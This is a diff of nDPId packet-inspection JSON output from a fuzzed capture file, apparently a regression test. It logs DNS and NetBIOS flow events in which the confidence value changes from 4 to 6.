-00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470764674,"flow_last_seen":1120470764674,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"re-.sippstar.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470764674,"flow_last_seen":1120470764674,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"re-.sippstar.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":1120470765675,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470765675,"pkt":"AEtUADRWAODtAW69CABFAAA+a5AAAIARS8vAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlZwhzaXC6c3RhcgNjb20AAAEAAQ=="} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470764674,"flow_last_seen":1120470765675,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470765675,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sip?star.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470764674,"flow_last_seen":1120470765675,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470765675,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sip?star.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":492,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42,"global_ts_msec":1120470767678} 00387{"packet_event_id":1,"packet_event_name":"packet","packet_id":492,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1120470765675,"pkt":"ADBUADRWAODtAW69CABFAAA+a5EABGQRS8rAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlZwhzaXBwc3RhcgNjb20AAAEAAQ=="} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":3,"flow_last_seen":1120470768028,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1120470768028,"pkt":"AODtAW69ADBUADRWCABFAACbAABAAGcRtv7AqAEBwKgBAgA1CukAh65F6OyBgAABAAEAAgACA3JlZwhzaXBwc3RhcgNjb20AAAEAAcAMAAEAAQAAAlgABFJi0SfAEAACAAEAAAJYAA8CbnMGaHNwZWVkA25ldADAEAACAAEAAAJYAAYDbnMzwEHAPgABAAEAAAUPAAQ+XcA7wFkAAQABAAAFDwAE1d1SAg=="} 
-00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1120470768028,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sippstar.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.98.209.39"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1120470768028,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sippstar.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.98.209.39"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1120470774132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470774132,"pkt":"ADBUADRWAODtAW69CABFAAA+a5IAAIARS8nAqAECwKhsAQrqADUAKnjTXO4BAAABAAAAAHEAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775049,"flow_last_seen":1120470775049,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470775049,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1120470775049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470775049,"pkt":"ADBUADRWAODtAW69CABFAAA+a5MAAIARfcjAqAECwKgBAQrrADUAKvLQ4u8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775049,"flow_last_seen":1120470775049,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470775049,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775049,"flow_last_seen":1120470775049,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470775049,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775129,"flow_last_seen":1120470775129,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470775129,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1120470775129,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470775129,"pkt":"ADBUADRWAODtAW69CABFAAA+a5QAAIARS1jAqAECwKgBAQrqADUAKnjTXO4BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 
-00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775129,"flow_last_seen":1120470775129,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470775129,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775129,"flow_last_seen":1120470775129,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470775129,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1120470776050,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470776050,"pkt":"ADBUADRWAODtAW69CABFAAA+a20AAIARS8bAqAECwKgBAQrrADUAKvLQ4u8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":2,"flow_last_seen":1120470777132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470777132,"pkt":"ADBUADRWAODtAW69CABFAAA+a5YAAIARS8XAqAECwKgBAQrqADUAKnjTXO4BAAABAAAAAAAQA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":3,"flow_last_seen":1120470778053,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470778053,"pkt":"ADBUADRWAODtAW69CABFAAA+a5cAAIARS8TAqAECwKgBAQrrADUAKvLQ4m8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":502,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42,"global_ts_msec":1120470779135} 
00387{"packet_event_id":1,"packet_event_name":"packet","packet_id":502,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1120470778053,"pkt":"ADBUADRWAODtAW69CABFAAA+ayVzAIARS8PAqAECwKgBAQrqADUAKnjTXO4BAAABAAAABAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":503,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470779408,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":503,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470779408,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 
00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":3,"flow_last_seen":1120470779409,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":1120470779409,"pkt":"ACjtAW69ADBUADRWCABFAAByAABAAEARtyfAqAEBwKgBAgA1CuoAXlCmXO6BgAABAAEAAgAAA3NpcAljeWJlcmNpdHkCZGsAAAECAcAMAAEAAQAAASwABNTyISPAEAACAAEAAAEsAAYDbnMywBDAEAACAAEAAAEsAAYDbnMxwBA="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470779409,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470779409,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470779487,"flow_last_seen":1120470779487,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470779487,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1120470779487,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470779487,"pkt":"ADBUADRWAODtAW69CABFAABIa5kAAIARS7jAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AkFrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470779487,"flow_last_seen":1120470779487,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470779487,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.ak","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470779487,"flow_last_seen":1120470779487,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470779487,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.ak","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":2,"flow_last_seen":1120470780685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470780685,"pkt":"ADBUADRWAODtAW69CABFAABIa5oAAIARS7fAqAECwKgBAQrsADUANNbHUxEBAAABrQAAAAAABDtzaXAEX3VkcANzaXAJqqqqqqqqqqqqqqqqqqqqqqo="} 
